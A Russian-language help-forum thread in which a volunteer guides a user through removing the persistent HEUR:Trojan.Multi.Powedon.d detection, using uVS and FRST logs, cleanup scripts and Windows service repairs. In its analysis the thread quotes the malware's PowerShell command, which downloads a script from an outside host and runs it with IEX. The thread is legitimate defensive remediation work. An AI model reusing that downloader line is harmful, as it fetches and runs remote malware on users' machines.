[РЕШЕНО] Не удаляется троян после лечения: HEUR:Trojan.Multi.Powedon.d

[mrolya]

Не удаляется троян HEUR:Trojan.Multi.Powedon.d, касперский находит его, делает лечение и ребутает комп, после ребута запускает сканирование и троян снова появляется, в общем все идет по кругу.
 

CollectionLog-2025.04.21-11.37.zip

[safety]

По скрину - это результат сканирования в KVRT?

Добавьте, пожалуйста, файлы отчетов о проверке из папки Reports.

+

Создайте дополнительно образ автозапуска в uVS:

 

1. Скачайте архив с актуальной версией утилиты uVS c зеркала программы отсюда (1) (здесь дополнительно встроен архиватор 7zip), распакуйте данный архив с программой в отдельный каталог.
2. запустите из каталога с модулями uVS файл Start.exe
(для Vista, W7- W11 выберите запуск от имени Администратора)
3. В стартовом окне программы - нажать "запустить под текущим пользователем". (если текущий пользователь с правами локального администратора)

4. Далее, меню "Файл" / Сохранить Полный образ автозапуска.

5. Дождитесь, пока процесс создания файла образа завершится.
Сохраненный файл образа автозапуска (с именем Ваш_компьютер_дата_время*.txt) автоматически добавится в архив 7z. (если используется uVS из зеркала со встроенным архиватором 7z)
6. Файл архива с образом автозапуска прикрепите к вашему сообщению на форуме.

Изменено 21 апреля пользователем safety

[mrolya]

Да, это KVRT.
О какой папке Reports идет речь? Не могу найти ее. Есть только 2 тхт - report1.log и report2.log.

 

DESKTOP-LACDDBR_2025-04-21_13-47-22_v4.99.12v x64.7z

[safety]

По очистке системы в uVS

Выполните скрипт очистки в uVS

Выполните в uVS скрипт из буфера обмена.

ЗАпускаем start,exe от имени Администратора (если не запущен)

текущий пользователь,

Копируем скрипт ниже из браузера в буфер обмена. Закрываем браузер.

В главном меню uVS выбираем: "Скрипт - выполнить скрипт из буфера обмена"

Скрипт автоматически очистит систему и завершит работу с перезагрузкой системы.

;uVS v4.99.12v x64 [http://dsrt.dyndns.org:8888]
;Target OS: NTv11.0
v400c
OFFSGNSAVE
hide E:\AUTOLOGGER\RSIT\RSITX64.EXE
;------------------------autoscript---------------------------

delref 103.209.38.132:81
delref %SystemDrive%\USERS\WHIMP\APPDATA\LOCAL\MICROSOFT\EDGE\USER DATA\DEFAULT\EXTENSIONS\HNDFJOGDCEACHKBGIOGLEHONPEJCDHEM\10.44_0\SAVEFROM.NET ПОМОЩНИК
delall %SystemDrive%\USERS\WHIMP\SYSTEMROOTDOC\TOPAZSERV.EXE
delref HTTPS://WWW.REVI.CC/
delall %SystemDrive%\USERS\WHIMP\APPDATA\LOCAL\TEMP\{C924FBB4-E1F6-4B8F-8922-975E79EBD728}\F4AABD8C-914B-43E5-8BD4-A9200EFE3DE9.CMD
delall %SystemDrive%\USERS\WHIMP\APPDATA\LOCAL\TEMP\{D681DCD4-D8C1-47AC-AA47-3272352137A2}\8295E8EF-82CA-4985-918B-E89A7D63D98E.CMD
apply

regt 27
; Bonjour
exec MsiExec.exe /X{56DDDFB8-7F79-4480-89D5-25E1F52AB28F} /quiet

deltmp
delref %SystemDrive%\PROGRAM FILES\NVIDIA CORPORATION\NVCONTAINER\NVCONTAINERTELEMETRYAPI.DLL
delref {E984D939-0E00-4DD9-AC3A-7ACA04745521}\[CLSID]
delref {61F77D5E-AFE9-400B-A5E6-E9E80FC8E601}\[CLSID]
delref %SystemDrive%\PROGRAM FILES\MOZILLA FIREFOX\DEFAULT-BROWSER-AGENT.EXE
delref %SystemRoot%\MICROSOFT.NET\FRAMEWORK\V2.0.50727\MSCORSEC.DLL
delref {02BF25D5-8C17-4B23-BC80-D3488ABDDC6B}\[CLSID]
delref {166B1BCA-3F9C-11CF-8075-444553540000}\[CLSID]
delref {233C1507-6A77-46A4-9443-F871F945D258}\[CLSID]
delref {4063BE15-3B08-470D-A0D5-B37161CFFD69}\[CLSID]
delref {88D969C0-F192-11D4-A65F-0040963251E5}\[CLSID]
delref {88D969C1-F192-11D4-A65F-0040963251E5}\[CLSID]
delref {88D969C2-F192-11D4-A65F-0040963251E5}\[CLSID]
delref {88D969C3-F192-11D4-A65F-0040963251E5}\[CLSID]
delref {88D969C4-F192-11D4-A65F-0040963251E5}\[CLSID]
delref {88D969C5-F192-11D4-A65F-0040963251E5}\[CLSID]
delref {8AD9C840-044E-11D1-B3E9-00805F499D93}\[CLSID]
delref {CA8A9780-280D-11CF-A24D-444553540000}\[CLSID]
delref {CFCDAA03-8BE4-11CF-B84B-0020AFBBCCFA}\[CLSID]
delref {D27CDB6E-AE6D-11CF-96B8-444553540000}\[CLSID]
delref %SystemDrive%\PROGRAM FILES\MOZILLA FIREFOX\UNINSTALL\HELPER.EXE
delref %SystemDrive%\PROGRAM FILES\MOZILLA FIREFOX\FIREFOX.EXE
delref {0F8604A5-4ECE-4DE1-BA7D-CF10F8AA4F48}\[CLSID]
delref {E6FB5E20-DE35-11CF-9C87-00AA005127ED}\[CLSID]
delref %SystemDrive%\USERS\WHIMP\APPDATA\LOCAL\MICROSOFT\ONEDRIVE\24.196.0929.0005\FILESYNCSHELL64.DLL
delref %SystemDrive%\USERS\WHIMP\APPDATA\LOCAL\MICROSOFT\ONEDRIVE\24.196.0929.0005\I386\FILESYNCSHELL.DLL
delref {09A47860-11B0-4DA5-AFA5-26D86198A780}\[CLSID]
delref %SystemRoot%\MICROSOFT.NET\FRAMEWORK64\V2.0.50727\MSCORSEC.DLL
delref F:\COD\CALL OF DUTY\CONTENT\RANDGRID.SYS
delref E:\CLIENTSERVICE\HORIZON_CLIENT_SERVICE.EXE
delref %SystemDrive%\KVRT2020_DATA\TEMP\7C924DD4D20055C80007791130E2D03F\KLUPD_3A966E41A_ARKMON.SYS
delref %SystemDrive%\PROGRAM FILES\GOOGLE\CHROME\APPLICATION\130.0.6723.92\RESOURCES\WEB_STORE\ИНТЕРНЕТ-МАГАЗИН CHROME
delref %SystemDrive%\PROGRAM FILES\GOOGLE\CHROME\APPLICATION\130.0.6723.92\RESOURCES\PDF\CHROME PDF VIEWER
delref %SystemDrive%\PROGRAM FILES\GOOGLE\CHROME\APPLICATION\130.0.6723.92\RESOURCES\NETWORK_SPEECH_SYNTHESIS\GOOGLE NETWORK SPEECH
delref %SystemDrive%\PROGRAM FILES\GOOGLE\CHROME\APPLICATION\134.0.6998.89\RESOURCES\HANGOUT_SERVICES\GOOGLE HANGOUTS
delref %SystemDrive%\PROGRAM FILES (X86)\MICROSOFT\EDGE\APPLICATION\130.0.2849.68\RESOURCES\WEB_STORE\ИНТЕРНЕТ-МАГАЗИН
delref %SystemDrive%\PROGRAM FILES (X86)\MICROSOFT\EDGE\APPLICATION\130.0.2849.68\RESOURCES\EDGE_CLIPBOARD\MICROSOFT CLIPBOARD EXTENSION
delref %SystemDrive%\PROGRAM FILES (X86)\MICROSOFT\EDGE\APPLICATION\131.0.2903.51\RESOURCES\EDGE_SUPPRESS_CONSENT_PROMPT\SUPPRESS CONSENT PROMPT
delref %SystemDrive%\PROGRAM FILES (X86)\MICROSOFT\EDGE\APPLICATION\130.0.2849.68\RESOURCES\MEDIA_INTERNALS_SERVICES\MEDIA INTERNALS SERVICES EXTENSION
delref %SystemDrive%\PROGRAM FILES (X86)\MICROSOFT\EDGE\APPLICATION\130.0.2849.68\RESOURCES\MICROSOFT_WEB_STORE\MICROSOFT STORE
delref %SystemDrive%\PROGRAM FILES (X86)\MICROSOFT\EDGE\APPLICATION\130.0.2849.68\RESOURCES\EDGE_FEEDBACK\EDGE FEEDBACK
delref %SystemDrive%\PROGRAM FILES (X86)\MICROSOFT\EDGE\APPLICATION\130.0.2849.68\RESOURCES\MICROSOFT_VOICES\MICROSOFT VOICES
delref %SystemDrive%\PROGRAM FILES (X86)\MICROSOFT\EDGE\APPLICATION\130.0.2849.68\RESOURCES\EDGE_PDF\MICROSOFT EDGE PDF VIEWER
delref %SystemDrive%\PROGRAM FILES (X86)\MICROSOFT\EDGE\APPLICATION\130.0.2849.68\RESOURCES\WEBRTC_INTERNALS\WEBRTC INTERNALS EXTENSION
delref %SystemDrive%\PROGRAM FILES (X86)\MICROSOFT\EDGE\APPLICATION\134.0.3124.51\RESOURCES\HANGOUT_SERVICES\WEBRTC EXTENSION
delref E:\CALL OF DUTY MODERN WARFARE REMASTERED\H1_SP64_SHIP.EXE
delref F:\DRAGON AGE THE VEILGUARD\DRAGON AGE THE VEILGUARD (2024)\DRAGON AGE THE VEILGUARD\DRAGON AGE THE VEILGUARD.EXE
delref F:\GHOST OF TSUSHIMA (2020-2024)\GHOST OF TSUSHIMA DIRECTOR'S CUT\GHOSTOFTSUSHIMA.EXE
delref %SystemDrive%\USERS\WHIMP\APPDATA\LOCAL\PLAY MACHINE\VKAPP.EXE
;-------------------------------------------------------------

restart

После перезагрузки системы:

Добавьте файл дата_времяlog.txt из папки откуда запускали uVS

+

добавьте новые логи FRST для контроля

[mrolya]

Сделал

2025-04-21_15-28-49_log.txt FRST.txt Addition.txt

[safety]

По логу FRST:

 

в системе остались поврежденные системные службы, которые надо исправить, и удалить службы созданные зловредом.

 

Скачайте с данной страницы

https://download.bleepingcomputer.com/win-services/windows-11-24H2/

следующие твики для исправления поврежденных служб:

BITS;
dosvc;
UsoSvc
WaaSMedicSvc
wuauserv

 

Запускаем каждый из загруженных файлов *.reg от имени Администратора, разрешаем внести изменения в реестр

Перезагружаем систему,

 

далее,

Выполните скрипт очистки в FRST

Запускаем FRST.exe от имени Администратора (если не запущен)

Копируем скрипт из браузера в буфер обмена, браузер закрываем.

Ждем, когда будет готов к работе,

Нажимаем в FRST кнопку "исправить".

Скрипт очистит систему, и завершит работу c перезагрузкой системы

 

Start::
HKLM\...\RunOnce: [497ab384-e3ae-42df-a4f1-8b8b1fd9c432] => "C:\Users\whimp\AppData\Local\Temp\{c94797f7-657e-474f-b406-debc9aea78af}\497ab384-e3ae-42df-a4f1-8b8b1fd9c432.cmd" (Нет файла) <==== ВНИМАНИЕ
HKLM\SOFTWARE\Policies\Microsoft\Windows Defender: Ограничение <==== ВНИМАНИЕ
HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate: Ограничение <==== ВНИМАНИЕ
HKLM\SOFTWARE\Policies\Microsoft\MRT: Ограничение <==== ВНИМАНИЕ
HKLM\SOFTWARE\Policies\Microsoft\Windows Defender Security Center: Ограничение <==== ВНИМАНИЕ
HKLM\SOFTWARE\Policies\Google: Ограничение <==== ВНИМАНИЕ
HKLM\SOFTWARE\Policies\Microsoft\Edge: Ограничение <==== ВНИМАНИЕ
Task: {F3E6E7ED-A196-4E44-8803-55FAB3AD4E29} - System32\Tasks\Microsoft\Windows\UpdateOrchestrator\USO_UxBroker => %systemroot%\system32\MusNotification.exe  (Нет файла)
HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer: Ограничение <==== ВНИМАНИЕ
HKU\S-1-5-21-1242675728-528239431-1336651218-1000\SOFTWARE\Policies\Microsoft\Internet Explorer: Ограничение <==== ВНИМАНИЕ
S2 BITS_bkp; C:\WINDOWS\System32\qmgr.dll [1474560 2025-03-28] (Microsoft Windows -> Microsoft Corporation)
U2 dosvc_bkp; C:\WINDOWS\system32\dosvc.dll [98304 2024-09-06] (Microsoft Windows -> Microsoft Corporation)
S2 UsoSvc_bkp; C:\WINDOWS\system32\usosvc.dll [81920 2024-09-06] (Microsoft Windows -> Microsoft Corporation)
S3 WaaSMedicSvc_bkp; C:\WINDOWS\System32\WaaSMedicSvc.dll [94208 2024-09-06] (Microsoft Windows -> Microsoft Corporation)
S3 wuauserv_bkp; C:\WINDOWS\system32\wuaueng.dll [172984 2024-09-06] (Microsoft Windows -> Корпорация Майкрософт)
Reboot::
End::

После перезагрузки:

Добавьте файл Fixlog.txt из папки, откуда запускали FRST, в ваше сообщение

Проверяем работоспособность системы.

Напишите по результату.

[mrolya]

Одну службу исправить не получилось, ошибка на скрине.
В остальном все сделал по инструкции, троян остался

Fixlog.txt

[safety]

Служба BITS не была  повреждена, по крайней мере в списке служб не было BITS_bkp, Остальные все были.

BITS_bkp => служба не найдено.

 

Так понимаю, что обнаружение в Memory продолжается.

Добавьте, пожалуйста, те два файла report*, о которых вы писали выше.

+

сделайте такой отчет:

 

Загрузите SecurityCheck by glax24 & Severnyj, https://safezone.cc/resources/security-check-by-glax24.25/ сохраните утилиту на Рабочем столе и извлеките из архива.
    Запустите из меню по щелчку правой кнопки мыши Запустить от имени администратора
    Если увидите предупреждение от вашего фаервола или SmartScreen относительно программы SecurityCheck, не блокируйте ее работу
    Дождитесь окончания сканирования, откроется лог в блокноте с именем SecurityCheck.txt
    Если Вы закрыли Блокнот, то найти этот файл можно в корне системного диска в папке с именем SecurityCheck, например C:\SecurityCheck\SecurityCheck.txt
    Прикрепите этот файл к своему следующему сообщению.

 

 

Изменено 21 апреля пользователем safety

[mrolya]

Да, обнаружение есть.

 

report1.log report2.log

[safety]

Посмотрите в корне диска папку KVRT_DATA, в ней должна быть папка Reports,

все файлы из папки reports добавьте в архив, и выложите архив здесь.

+

+

+

сделайте такой отчет:

 

Загрузите SecurityCheck by glax24 & Severnyj, https://safezone.cc/resources/security-check-by-glax24.25/ сохраните утилиту на Рабочем столе и извлеките из архива.
    Запустите из меню по щелчку правой кнопки мыши Запустить от имени администратора
    Если увидите предупреждение от вашего фаервола или SmartScreen относительно программы SecurityCheck, не блокируйте ее работу
    Дождитесь окончания сканирования, откроется лог в блокноте с именем SecurityCheck.txt
    Если Вы закрыли Блокнот, то найти этот файл можно в корне системного диска в папке с именем SecurityCheck, например C:\SecurityCheck\SecurityCheck.txt
    Прикрепите этот файл к своему следующему сообщению.

Изменено 21 апреля пользователем safety

[mrolya]

Сделал

Новая сжатая ZIP-папка.zip SecurityCheck.txt

[safety]

По детекту --- HEUR:Trojan.Multi.Powedon.d

 

Цитата

К данному семейству относятся объекты автозапуска, которые содержат PowerShell скрипт, скачивающий вредоносное ПО.

 

Powershell.exe действительно активен, судя по списку процессов в логах FRST и uVS.

 

 

Возможно, реакция KVRT на данную командную строку:

"wscript.exe" /E:vbscript c

которая запускается через задачу.

 

Скрипт, который запускает Powershell:

 

Цитата

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windo 1 -noexit -exec bypass [System.Net.WebClient]$web = New-Object System.Net.WebClient;[System.IO.Stream]$stream = $web.OpenRead('[хттпс://asobimo.link/ubr.txt');[System.IO.StreamReader]$txt = New-Object System.IO.StreamReader -argumentList $stream;[string]$result = $txt.ReadToEnd();IEX $result; ugr;

 

Выполните в UVS

Выполните скрипт очистки в uVS

Выполните в uVS скрипт из буфера обмена.

ЗАпускаем start,exe от имени Администратора (если не запущен)

текущий пользователь,

Копируем скрипт ниже из браузера в буфер обмена. Закрываем браузер.

В главном меню uVS выбираем: "Скрипт - выполнить скрипт из буфера обмена"

Скрипт автоматически очистит систему и завершит работу с перезагрузкой системы.

;uVS v4.99.12v x64 [http://dsrt.dyndns.org:8888]
;Target OS: NTv11.0
v400c
OFFSGNSAVE
;---------command-block---------
unload %Sys32%\WSCRIPT.EXE
deltsk %Sys32%\WSCRIPT.EXE
apply

restart

После перезагрузки системы:

Добавьте файл дата_времяlog.txt из папки откуда запускали uVS

+

Проверьте в KVRT будет ли новый детект HEUR:Trojan.Multi.Powedon.d или нет.

Изменено 22 апреля пользователем safety

[mrolya]

Все супер, обнаружений нет.
Благодарю вас!

2025-04-21_17-53-09_log.txt

[safety]

Хорошо, если других вопросов и проблем в работе системы не осталось:

 

Выполните по возможности обновление данного ПО:

 

Malwarebytes version 4.6.17.334 v.4.6.17.334 Внимание! Скачать обновления
--------------------------- [ OtherUtilities ] ----------------------------
Приложение NVIDIA 10.0.0.535 v.10.0.0.535 Внимание! Скачать обновления
Discord v.1.0.9166 Внимание! Скачать обновления
qBittorrent v.5.0.1 Внимание! Скачать обновления
-------------------------------- [ Media ] --------------------------------
iTunes v.12.13.4.4 Внимание! Скачать обновления
^Для проверки новой версии используйте приложение Apple Software Update^
Mozilla Firefox (x64 ru) v.132.0 Внимание! Скачать обновления
^Проверьте обновления через меню Справка - О Firefox!^
 

Изменено 22 апреля пользователем safety

[safety]

Мы были рады Вам помочь! Надеемся, что Вы остались довольны результатом. На нашем форуме также можно получить компьютерную помощь, помощь по продуктам "Лаборатории Касперкого", обсудить технологии и технику, заказать эксклюзивную сувенирную продукцию "Лаборатории Касперского" бесплатно! Форумчане ежегодно путешествуют. В числе приглашенных в Турцию, Армению, Сочи, Камбоджу можете быть и Вы! Будем рады видеть Вас в наших рядах! Всегда ваш, клуб "Лаборатории Касперского".